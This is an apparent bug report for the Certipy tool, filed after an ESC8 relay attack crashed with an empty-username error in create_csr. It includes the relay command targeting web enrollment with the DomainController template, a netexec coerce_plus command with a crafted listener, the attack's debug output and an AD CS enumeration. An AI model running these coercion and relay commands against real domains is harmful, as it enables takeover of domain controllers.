Open
Labels: bug (Something isn't working)
Description
Certipy Version
5.0.4
Operating System
Kali Linux 2025.3
Command Used
certipy-ad relay -target http://redacted.domain.com -debug -out login.pfx -template DomainController
Error Message / Unexpected Output
[*] SMBD-Thread-30 (process_request_thread): Received connection from 10.10.10.10, attacking target http://redacted.domain.com
[+] Using target: http://redacted.domain.com/certsrv/certfnsh.asp...
[+] Base URL: http://redacted.domain.com
[+] Path: /certsrv/certfnsh.asp
[+] Using timeout: 10
[+] Using path: /certsrv/certfnsh.asp
[+] Using path: /certsrv/certfnsh.asp
[*] HTTP Request: GET http://redacted.domain.com/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://redacted.domain.com/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://redacted.domain.com/certsrv/certfnsh.asp "HTTP/1.1 200 OK"
[+] HTTP server returned status code 200, treating as successful login
[*] Authenticating against http://redacted.domain.com as / SUCCEED
[+] Generating RSA key
[-] Failed to run attack: Attribute's length must be >= 1 and <= 64, but it was 0
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/certipy/commands/relay.py", line 423, in run
    self._run()
    ~~~~~~~~~^^
  File "/usr/lib/python3/dist-packages/certipy/commands/relay.py", line 454, in _run
    self._request_certificate()
    ~~~~~~~~~~~~~~~~~~~~~~~~~^^
  File "/usr/lib/python3/dist-packages/certipy/commands/relay.py", line 527, in _request_certificate
    csr, key = create_csr(
               ~~~~~~~~~~^
        self.username,
        ^^^^^^^^^^^^^^
    ...<6 lines>...
        smime=self.adcs_relay.smime,
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    )
    ^
  File "/usr/lib/python3/dist-packages/certipy/lib/certificate.py", line 811, in create_csr
    x509.NameAttribute(NameOID.COMMON_NAME, username.capitalize()),
    ~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/cryptography/x509/name.py", line 152, in __init__
    raise ValueError(msg)
ValueError: Attribute's length must be >= 1 and <= 64, but it was 0
Relevant certipy find Output (abbreviated and redacted)
Certificate Authorities
  0
    CA Name : domain-CA
    DNS Name : redacted.domain.com
    Certificate Subject : CN=domain-CA, DC=domain, DC=com
    Certificate Serial Number : 2321B22DF2AD6F8B4E5FC638A6F83C64
    Certificate Validity Start : 2025-12-22 14:48:57+00:00
    Certificate Validity End : 2525-12-22 14:58:57+00:00
    Web Enrollment
      HTTP
        Enabled : True
      HTTPS
        Enabled : False
    User Specified SAN : Disabled
    Request Disposition : Issue
    Enforce Encryption for Requests : Enabled
    Active Policy : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner : domain\Administrators
      Access Rights
        ManageCa : domain\Administrators
                   domain\Domain Admins
                   domain\Enterprise Admins
        ManageCertificates : domain\Administrators
                             domain\Domain Admins
                             domain\Enterprise Admins
        Enroll : domain\Authenticated Users
    [!] Vulnerabilities
      ESC8 : Web Enrollment is enabled over HTTP.
Certificate Templates : [!] Could not find any certificate templates
Expected Behavior
Used netexec to coerce the authentication (coerce_plus); coercion methods were successful and should've returned a relayed administrator.pfx certificate.
I was using Kerberos authentication.
netexec smb -M coerce_plus --use-kcache dc.domain.com -o LISTENER=DC-DCUWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA
Additional Context
Downgraded to Python 3.9.0, Python 3.10.0, and ran an earlier Certipy version (Certipy 4.8.2), same issue.